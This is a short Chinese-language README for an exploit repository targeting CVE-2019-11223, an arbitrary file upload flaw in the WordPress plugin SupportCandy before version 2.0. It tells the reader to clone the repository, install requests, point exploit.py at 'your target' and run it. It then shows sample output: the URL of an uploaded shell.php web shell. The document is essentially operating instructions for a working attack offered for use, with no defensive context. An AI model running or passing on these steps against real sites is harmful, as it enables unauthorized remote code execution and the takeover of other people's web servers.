WordPress插件SupportCandy 2.0以下版本中的任意文件上传
git clone https://github.com/AngelCtulhu/CVE-2019-11223.git
pip install requests
在 exploit.py 中将 localhost 改为你的目标
python exploit.py
"http:\/\/localhost\/wp-content\/uploads\/wpsc\/1555513124_shell.php"
本项目采用 MIT 许可证 - 详见 LICENSE 文件